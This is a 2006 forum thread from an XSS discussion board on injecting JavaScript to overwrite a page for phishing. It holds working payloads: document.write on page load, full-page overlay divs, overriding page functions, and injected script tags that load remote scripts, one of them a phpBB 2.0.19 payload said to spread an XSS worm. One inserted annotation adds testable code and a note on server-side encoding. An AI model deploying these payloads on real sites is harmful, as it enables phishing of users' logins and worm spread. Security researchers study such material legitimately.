Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Overwriting a page
Posted by: rsnake
Date: August 20, 2006 07:01PM

I got an email a while back from Blad3 talking about ways to overwrite an entire page so that you can phish from it. I've seen a few really huge ways, using setTimeout or whatever. All of those seem way way too complicated and glitchy. The best way I've seen is to use a simple command like:

<body onload="document.write('owned')">

That overwrites the entire page because after the page has finished loading, document.write doesn't know where to start writing to since you aren't using appendChild. Once you output the text to the page it overwrites the entire page with the content. It's also very short and very reliable, which is why I like it.

Re: Overwriting a page
Posted by: web
Date: August 21, 2006 03:39AM

I was just wondering about this a couple of days ago. I'm surprised I didn't think of this.

Thanks!

Re: Overwriting a page
Posted by: WhiteAcid
Date: August 21, 2006 03:50AM

Why would you want to write over a page? I thought the whole point was to make them think they are on a valid site while not actually being on one. So instead of overwriting the page you'd just change the target attribute of forms, or implement a JS key logger.

There's also plenty of other ways like document.body.innerHTML = "new content", and if you really wanted you could create a new div tag which goes over everything else by injecting something like <div style="width:100%;height:100%;position:absolute;top:0px;left:0px;background-color:#fff;z-index:99;">content here</div>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Overwriting a page
Posted by: rsnake
Date: August 21, 2006 10:02AM

WhiteAcid, there are many reasons you might want to do this. Take the expect vulnerability for example. Clearly, the text on the page doesn't convince anyone that they are on a valid web page, so you need to overwrite it. Say you are on a page that is like a web-board and it is XSS-able, but the sign-in page is not. You can create an onclick event that does a document.write (or a series of them) to create the sign-in page on the forum since the user is probably expecting to have to sign-in anyway. It comes in handy.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Overwriting a page
Posted by: WhiteAcid
Date: August 21, 2006 10:52AM

Ah yes, I didn't think of that scenario.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 12:32PM

It also occurred to me, there also is an advantage if you want to break any of the JavaScript protections on a page. If the page says you cannot do certain things, it can help break out of those restrictions.

Re: Overwriting a page
Posted by: WhiteAcid
Date: August 22, 2006 12:40PM

Actually, a simpler solution to get around JS functions (this only works if they are functions) is to create a new function of the same name but with no content. Run the following code and you'll see that both alerts display 'foobar'.
<script>
function foo(){alert('bar')}
foo()
function foo(){alert('foobar')}
foo()
</script>
and the following code does nothing:
<script>
function foo(){alert('bar')}
foo()
function foo(){alert('foobar')}
foo()
function foo() {}
foo()
</script>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

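An added example, not code from the thread, that reproduces WhiteAcid's two snippets without alert() so the effect can be checked, and adds one caveat the thread does not cover: the override only works on function declarations, not on a function held in a const binding.

```javascript
// Function declarations are hoisted: within one script the LAST declaration
// of a name is bound before any statement runs, so every call, even one
// written earlier in the source, executes that final body.
function lastDeclarationWins() {
  const shown = [];                        // stands in for the alert() calls
  foo();
  function foo() { shown.push('bar'); }
  foo();
  function foo() { shown.push('foobar'); } // wins: both calls record 'foobar'
  return shown;                            // ['foobar', 'foobar']
}

// Same idea with an empty declaration appended: every call becomes a no-op,
// which is why the second snippet in the post "does nothing".
function emptyDeclarationNeuters() {
  const shown = [];
  foo();
  function foo() { shown.push('bar'); }
  foo();
  function foo() { shown.push('foobar'); }
  foo();
  function foo() {}                        // last declaration: no body, no output
  return shown;                            // []
}

// Caveat (beyond the thread): a later `function foo` declaration cannot replace
// a `const foo` in the same scope. The conflict is a SyntaxError at parse time,
// so the whole script is rejected rather than silently overridden. The snippet
// is compiled with new Function() here only so the parse error can be caught.
function constBindingResists() {
  try {
    new Function("const foo = () => 'bar'; function foo() {} return foo();");
    return 'redeclared';
  } catch (e) {
    return e instanceof SyntaxError ? 'SyntaxError' : 'other';
  }
}
```

Client-side checks like these are still not a security boundary: a parse error stops one injected script, not the attacker, so the fix for the thread's scenario remains output encoding on the server.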
Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 01:02PM

How is that simpler than:

<body onload="document.write('owned')">

Re: Overwriting a page
Posted by: Dave
Date: August 22, 2006 01:12PM

You don't have to build your own layout...

Re: Overwriting a page
Posted by: WhiteAcid
Date: August 22, 2006 01:49PM

Well... it depends. If let's say you are injecting into login.php and want to keep it looking like login.php but want to get rid of a function, then overwriting the function may be the best way. On the other hand, if you're XSSing (I'm officially making that a verb) index.php to look like login.php, then your way may be easier.

Also, if the JS function is called from an external file then document.write('owned') doesn't scrap the function. I just tried hacking together something to remove all external scripts, but so far I haven't got it working. I'll try a bit more but if I can't get it within the next 5-10 minutes I'll go back to my previous work.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 03:23PM

Dave, that's true, but in most cases where you want to overwrite the whole page, you want to re-write the page anyway. I'm really talking about in the case where a) you want to overwrite the whole page (the title of the original post) and b) want to disable functions.

WhiteAcid, yah, I was talking about using document.write to output whatever... not to call remote functions... that won't work. But if you document.write a <script src that will work. i.e.:

<BODY ONLOAD="document.write('<script src=http://ha.ckers.org/xss.js></script>')">

- RSnake
Gotta love it. http://ha.ckers.org

Re: Overwriting a page
Posted by: Girzi
Date: August 23, 2006 07:43AM

rsnake,
<BODY ONLOAD="document.write('<script src=http://ha.ckers.org/xss.js></script>')">
that will deface the page and put <script src=http://ha.ckers.org/xss.js></script> on it =) It's very interesting on some boards like phpBB.
Remember phpBB 2.0.19 and its flaw: when HTML is enabled we could inject a script like this:

<pre a='>' onmouseover='document.write("<script src=`http://127.0.0.1/xssvirus/POST/phpbb.js`></script>")' b='<pre' >
Hehehehe
</pre>

Where phpbb.js is a xss Worm =) (seoblackhat => scientifc labs :P)


Anyway, JavaScript and XSS are very very interesting =)

Re: Overwriting a page
Posted by: rsnake
Date: August 23, 2006 10:18AM

That's exactly right. Any time you just do a document write and it's not part of the loading process, it completely overwrites the visible page. It's a weird effect that basically allows you to control everything on it.

And yes, that includes almost every event handler (all 90+ of them): http://ha.ckers.org/xss.html#XSS_Event_handlers

This is a pretty nasty side effect, that I haven't seen many people talk about, and I am sure it has other uses as well (maybe breaking out of CSS restrictions - but you could do that anyway with JavaScript). I dunno...

- RSnake
Gotta love it. http://ha.ckers.org

Re: Overwriting a page
Posted by: alf
Date: September 30, 2006 03:59AM

I've done this some time ago, it is really amazing if you are able to "rewrite" an entire page using <div>'s with position:absolute and stuff like that.
I really liked it =]

Re: Overwriting a page
Posted by: metal_hurlant
Date: September 30, 2006 05:16AM

Just a quick note regarding the event handler list at http://ha.ckers.org/xss.html#XSS_Event_handlers :

It would be interesting to add Firefox-specific stuff, such as the ones documented at http://www.xulplanet.com/references/elemref/ref_EventHandlers.html and http://www.xulplanet.com/tutorials/xultu/events.html

Some of those are likely to work in a non-xul context.
(I have a nagging suspicion one can insert inline XUL fragments in a HTML document, but I can't point to a good example of that right now.)


[ also, there's a typo for "24. onDataAvailaible" in your list ]
